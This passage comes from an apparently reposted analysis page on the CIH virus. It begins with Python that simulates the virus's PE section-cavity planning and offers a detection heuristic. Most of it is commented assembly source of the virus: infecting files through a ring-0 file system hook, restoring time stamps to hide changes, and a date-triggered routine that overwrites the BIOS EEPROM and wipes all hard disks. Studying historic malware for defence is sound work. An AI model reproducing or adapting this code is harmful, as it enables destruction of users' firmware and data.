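    coff = e_lfanew + 4
    _, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    if struct.unpack_from("<H", image, opt)[0] != 0x10B:   # Magic: 010bh for PE32
        raise ValueError("only PE32 handled here")
    image_base, = struct.unpack_from("<I", image, opt + 28)
    sections = []
    for i in range(nsect):
        off = opt + opt_size + 40 * i                       # 28h = sizeof section header
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", image, off)
        chars, = struct.unpack_from("<I", image, off + 36)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "hdr": off,
                         "VirtualSize": vsize, "VirtualAddress": vaddr,
                         "SizeOfRawData": rawsize, "PointerToRawData": rawptr,
                         "Characteristics": chars})
    return image_base, sections


def slack(sec):
    """SizeOfRawData - VirtualSize; 0 where the loop's jbe would skip the section."""
    return max(0, sec["SizeOfRawData"] - sec["VirtualSize"])


def cavity_plan(image, payload_size):
    """Walk the sections like the loop does and return the (file_offset, load_address, size)
    fragments that would hold payload_size bytes, or None if the combined slack is too small."""
    image_base, sections = parse_pe32(image)
    plan, remaining = [], payload_size
    for sec in sections:
        room = slack(sec)
        if room == 0:
            continue
        take = min(room, remaining)
        plan.append((sec["PointerToRawData"] + sec["VirtualSize"],              # file pointer
                     image_base + sec["VirtualAddress"] + sec["VirtualSize"],   # loaded address
                     take))
        remaining -= take
        if remaining == 0:
            return plan
    return None


def mark_headers(image, payload_size):
    """Header-only simulation of the loop's bookkeeping: VirtualSize grows by the bytes taken
    and Characteristics gets 40000040h. No payload bytes are written anywhere."""
    plan = cavity_plan(image, payload_size)
    if plan is None:
        return None
    out = bytearray(image)
    taken = {file_off: size for file_off, _, size in plan}
    for sec in parse_pe32(image)[1]:
        size = taken.get(sec["PointerToRawData"] + sec["VirtualSize"])
        if size is not None:
            struct.pack_into("<I", out, sec["hdr"] + 8, sec["VirtualSize"] + size)
            struct.pack_into("<I", out, sec["hdr"] + 36, sec["Characteristics"] | CIH_OR_MASK)
    return bytes(out)


def cih_style_sections(image):
    """Heuristic (this example's own): a code section that also has the initialized-data flag
    and zero slack. Linkers do not normally emit that combination on a code section."""
    return [s["name"] for s in parse_pe32(image)[1]
            if s["Characteristics"] & IMAGE_SCN_CNT_CODE
            and s["Characteristics"] & IMAGE_SCN_CNT_INITIALIZED_DATA
            and slack(s) == 0]


def build_sample_pe(specs):
    """Constructed test input: a header-only PE32 image (no section bodies are needed)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                    # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, 224, 0x010F)
    opt = bytearray(224)                                     # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                    # Magic
    struct.pack_into("<I", opt, 16, 0x1000)                  # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x00400000)              # ImageBase
    struct.pack_into("<I", opt, 32, 0x1000)                  # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                   # FileAlignment
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"),
                                vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in specs)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


# Constructed sample: .text has 1ech bytes of slack, .rdata none, .data 1d0h.
SAMPLE = build_sample_pe([
    (".text",  0x0C14, 0x1000, 0x0E00, 0x0400, 0x60000020),
    (".rdata", 0x0200, 0x2000, 0x0200, 0x1200, 0x40000040),
    (".data",  0x0030, 0x3000, 0x0200, 0x1400, 0xC0000040),
])

if __name__ == "__main__":
    for sec in parse_pe32(SAMPLE)[1]:
        print(f"{sec['name']:8s} slack={slack(sec):#06x}")
    print("plan for 796 bytes:", cavity_plan(SAMPLE, 796))
    print("flagged after marking:", cih_style_sections(mark_headers(SAMPLE, 796)))
```

The 796-byte payload size used in the usage call is the v1.1 "basic" size quoted in the page's history; the plan shows why the loop needs a table of fragments rather than one write: the payload is split across .text and .data. The heuristic is deliberately cheap and will miss an infector that clears the code flag or leaves slack; it is meant to show what the loop changes in the header, not to replace a scanner.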

; *********************************
; * When VirusGame Calls VxDCall, *
; * VMM Modifies the Call         *
; * Instruction in Place.         *
; * Before Writing my Virus to    *
; * File, I Must Restore Them     *
; * First. ^__^                   *
; *********************************
        lea     eax, (LastVxDCallAddress-2-@9)[esi] ; address of the last "int 20h" VxD call instruction
        mov     cl, VxDCallTableSize            ; number of VxD calls to restore
LoopOfRestoreVxDCallID:
        mov     word ptr [eax], 20cdh           ; restore the "int 20h" opcode bytes
        mov     edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] ; fetch the service ID from VxDCallIDTable
        mov     [eax+2], edx                    ; place it after "int 20h": the "int 20h / dd service-ID" form
        movzx   edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi] ; distance back to the previous call instruction
        sub     eax, edx                        ; EAX = address of the previous VxD call
        loop    LoopOfRestoreVxDCallID          ; restore the remaining calls

; *********************************
; * Let's Write Virus Code        *
; * to the File                   *
; *********************************
WriteVirusCodeToFile:
        mov     eax, dr1                        ; DR1 holds the saved ESP
        mov     ebx, [eax+10h]                  ; EBX = file handle saved on the stack
        mov     edi, [eax]                      ; EDI = address of IFSMgr_Ring0_FileIO saved on the stack
LoopOfWriteVirusCodeToFile:
        pop     ecx                             ; Address of Buffer (this virus fragment)
        jecxz   SetFileModificationMark         ; a zero address is the end mark of the table
        mov     esi, ecx                        ; ESI = buffer to write
        mov     eax, 0d601h                     ; R0_WRITEFILE function number
        pop     edx                             ; file pointer
        pop     ecx                             ; Size
        call    edi                             ; VxDCall IFSMgr_Ring0_FileIO: write one fragment
                                                ; written this way: virus code, virus code section table,
                                                ; new section table, new entry point, infection mark
        jmp     LoopOfWriteVirusCodeToFile

; *********************************
; * Let's Set CF=1 ==>            *
; * Need to Restore File          *
; * Modification Time             *
; *********************************
SetFileModificationMark:
        pop     ebx
        pop     eax
        stc                                     ; set CF (carry flag) as the return flag
        pushf                                   ; save the flags

; *********************************
; * Close File                    *
; *********************************
CloseFile:
        xor     eax, eax
        mov     ah, 0d7h                        ; R0_CLOSEFILE function number
        call    edi                             ; VxDCall IFSMgr_Ring0_FileIO

; *********************************
; * Need to Restore File          *
; * Modification Time!?           *
; *********************************
        popf
        pop     esi                             ; ESI = file name buffer
        jnc     IsKillComputer                  ; CF=0: nothing to restore, go to the trigger check

; *********************************
; * Restore File Modification Time*
; *********************************
        mov     ebx, edi
        mov     ax, 4303h                       ; set file modification date/time
        mov     ecx, (FileModificationTime-@7)[esi]    ; saved DOS time (low word)
        mov     edi, (FileModificationTime+2-@7)[esi]  ; saved DOS date (high word)
        call    ebx                             ; VxDCall IFSMgr_Ring0_FileIO: restore the time stamp

; *********************************
; * Disable OnBusy                *
; *********************************
DisableOnBusy:
        dec     byte ptr (OnBusy-@7)[esi]       ; clear the busy flag

; *********************************
; * Call Previous FileSystemApiHook
; *********************************
PrevHook:
        popad                                   ; restore all registers
        mov     eax, dr0                        ; DR0 holds the pointer to the previous hook
        jmp     [eax]                           ; chain to the previous file system hook

; *********************************
; * Call the Function That the IFS*
; * Manager Would Normally Call To*
; * Implement This Particular I/O *
; * Request.                      *
; *********************************
pIFSFunc:                                       ; FileSystemApiHookFunction parameters: see table 2
        mov     ebx, esp                        ; EBX = ESP, to reach the parameters
        push    dword ptr [ebx+20h+04h+14h]     ; push pIoreq (20h = pushad frame, 04h = return address)
        call    [ebx+20h+04h]                   ; call pIFSFunc (the FSD function address)
        pop     ecx                             ; ECX = pIoreq again
        mov     [ebx+1ch], eax                  ; modify EAX value in stack (1ch = EAX slot of the pushad frame)

; *********************************
; * After Call pIFSFunc,          *
; * Get Some Data From the        *
; * Returned pIoreq.              *
; *********************************
        cmp     dword ptr [ebx+20h+04h+04h], 00000024h ; function code 24h = file open; see table 2
        jne     QuitMyVirusFileSystemHook

; *********************************
; * Get the File Modification     *
; * Date and Time in DOS Format.  *
; *********************************
        mov     eax, [ecx+28h]
        mov     (FileModificationTime-@6)[esi], eax ; save the file's DOS date and time

; *********************************
; * Quit My Virus'                *
; * IFSMgr_FileSystemHook         *
; *********************************
QuitMyVirusFileSystemHook:
        popad                                   ; restore all registers
        ret                                     ; return from the virus' file system hook

; *********************************
; * Kill Computer!?... *^_^*      *
; *********************************
; KillComputer module (!! dangerous: the analysis of its principle and detailed notes are not published !!)
IsKillComputer:
        ; Get Now Day from BIOS CMOS
        mov     al, 07h
        out     70h, al
        in      al, 71h                         ; read the current day of month from CMOS
        xor     al, 26h                         ; ??/26/????
        IF DEBUG
        jmp     DisableOnBusy
        ELSE
        jnz     DisableOnBusy                   ; not the 26th: return; on the 26th, KillComputer (too dangerous) *^_^*
        ENDIF

; *********************************
; * KILL KILL KILL KILL KILL KILL *
; * KILL KILL KILL KILL KILL KILL *
; * KILL KILL KILL KILL KILL KILL *
; *********************************

; *********************************
; * Kill BIOS EEPROM              *
; *********************************
        mov     bp, 0cf8h
        lea     esi, IOForEEPROM-@7[esi]

; Show BIOS Page in 000E0000 - 000EFFFF (64 KB)
        mov     edi, 8000384ch
        mov     dx, 0cfeh
        cli
        call    esi

; Show BIOS Page in 000F0000 - 000FFFFF (64 KB)
        mov     di, 0058h
        dec     edx                             ; and al, 0fh
        mov     word ptr (BooleanCalculateCode-@10)[esi], 0f24h
        call    esi

; Show the BIOS Extra ROM Data in Memory 000E0000 - 000E01FF (512 Bytes),
; and the Section can be Written...
        lea     ebx, EnableEEPROMToWrite-@10[esi]
        mov     eax, 0e5555h
        mov     ecx, 0e2aaah
        call    ebx
        mov     byte ptr [eax], 60h
        push    ecx
        loop    $

; Kill the BIOS Extra ROM Data in Memory 000E0000 - 000E007F (80h Bytes)
        xor     ah, ah
        mov     [eax], al
        xchg    ecx, eax
        loop    $

; Show and Enable the BIOS Main ROM Data 000E0000 - 000FFFFF (128 KB) can be Written...
        mov     eax, 0f5555h
        pop     ecx
        mov     ch, 0ah
        call    ebx
        mov     byte ptr [eax], 20h
        loop    $

; Kill the BIOS Main ROM Data in Memory 000FE000 - 000FE07F (80h Bytes)
        mov     ah, 0e0h
        mov     [eax], al

; Hide BIOS Page in 000F0000 - 000FFFFF (64 KB)
        ; or al, 10h
        mov     word ptr (BooleanCalculateCode-@10)[esi], 100ch
        call    esi

; *************************************************
; * Kill All HardDisk                             *
; *************************************************
; * IOR Structure of IOS_SendCommand Needs        *
; *************************************************
; * ?? ?? ?? ?? 0100 ?? ?? 01 05 00 40 ?? ?? ??   *
; * 00 00 00 00 00 00 00 00 c0                    *
; * ?? ?? ?? ?? ...                               *
; * ?? ?? ?? ?? ... 80 ??                         *
; *************************************************
KillHardDisk:
        xor     ebx, ebx
        mov     bh, FirstKillHardDiskNumber
        push    ebx
        sub     esp, 2ch
        push    0c0001000h
        mov     bh, 08h
        push    ebx
        push    ecx
        push    ecx
        push    ecx
        push    40000501h
        inc     ecx
        push    ecx
        push    ecx
        mov     esi, esp
        sub     esp, 0ach
LoopOfKillHardDisk:
        int     20h
        dd      00100004h                       ; VxDCall IOS_SendCommand
        cmp     word ptr [esi+06h], 0017h
        je      KillNextDataSection
ChangeNextHardDisk:
        inc     byte ptr [esi+4dh]
        jmp     LoopOfKillHardDisk
KillNextDataSection:
        add     dword ptr [esi+10h], ebx
        mov     byte ptr [esi+4dh], FirstKillHardDiskNumber
        jmp     LoopOfKillHardDisk

; *********************************
; * Enable EEPROM to Write        *
; *********************************
EnableEEPROMToWrite:
        mov     [eax], cl
        mov     [ecx], al
        mov     byte ptr [eax], 80h
        mov     [eax], cl
        mov     [ecx], al
        ret

; *********************************
; * IO for EEPROM                 *
; *********************************
IOForEEPROM:
@10 = IOForEEPROM
        xchg    eax, edi
        xchg    edx, ebp
        out     dx, eax
        xchg    eax, edi
        xchg    edx, ebp
        in      al, dx
BooleanCalculateCode = $
        or      al, 44h
        xchg    eax, edi
        xchg    edx, ebp
        out     dx, eax
        xchg    eax, edi
        xchg    edx, ebp
        out     dx, al
        ret

; *********************************
; * Static Data                   *
; *********************************
LastVxDCallAddress = IFSMgr_Ring0_FileIO        ; address of the last VxD call instruction
VxDCallAddressTable db 00h                      ; distances between consecutive VxD call instructions
                    db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
                    db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
                    db IFSMgr_Ring0_FileIO-UniToBCSPath
VxDCallIDTable      dd 00010053h, 00400068h, 00400041h, 00400032h ; VxD service IDs, in the same order
VxDCallTableSize = ($-VxDCallIDTable)/04h       ; number of VxD calls the program uses

; *********************************
; * Virus Version Copyright       *
; *********************************
VirusVersionCopyright db 'CIH v'                ; CIH virus marker
                      db MajorVirusVersion+'0'  ; major version number
                      db '.'
                      db MinorVirusVersion+'0'  ; minor version number
                      db ' TATUNG'              ; author name

; *********************************
; * Virus Size                    *
; *********************************
VirusSize = $
; SizeOfVirusCodeSectionTableEndMark (04h)
; NumberOfSections (??) * SizeOfVirusCodeSectionTable (08h)
; SizeOfTheFirstVirusCodeSectionTable (04h)
; (these are added to VirusSize to get the full length of the virus code in the file)

; *********************************
; * Dynamic Data                  *
; *********************************
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy                  db 0                    ; busy flag
FileModificationTime    dd ?                    ; file modification time
FileNameBuffer          db FileNameBufferSize dup(?) ; 7Fh-byte file name buffer
@7 = FileNameBuffer
DataBuffer = $
@8 = DataBuffer
NumberOfSections        dw ?                    ; number of sections
TimeDateStamp           dd ?                    ; file time stamp
SymbolsPointer          dd ?
NumberOfSymbols         dd ?                    ; symbol table
SizeOfOptionalHeader    dw ?                    ; size of the optional header
_Characteristics        dw ?                    ; file characteristics flags
Magic                   dw ?                    ; magic word (always 010bh for PE32)
LinkerVersion           dw ?                    ; linker version number
SizeOfCode              dd ?                    ; code section size
SizeOfInitializedData   dd ?                    ; initialized data size
SizeOfUninitializedData dd ?                    ; uninitialized data size
AddressOfEntryPoint     dd ?                    ; program entry point RVA
BaseOfCode              dd ?
BaseOfData              dd ?                    ; data section start RVA
ImageBase               dd ?                    ; preferred load base address
@9 = $
SectionAlignment        dd ?                    ; section alignment
FileAlignment           dd ?                    ; file alignment
OperatingSystemVersion  dd ?
ImageVersion            dd ?                    ; user-defined version number
SubsystemVersion        dd ?                    ; subsystem version number
Reserved                dd ?                    ; reserved
SizeOfImage             dd ?                    ; size of the loaded image
SizeOfHeaders           dd ?                    ; size of the headers and section table

Please credit the original source when reposting: https://www.9cbs.com/read-90938.html
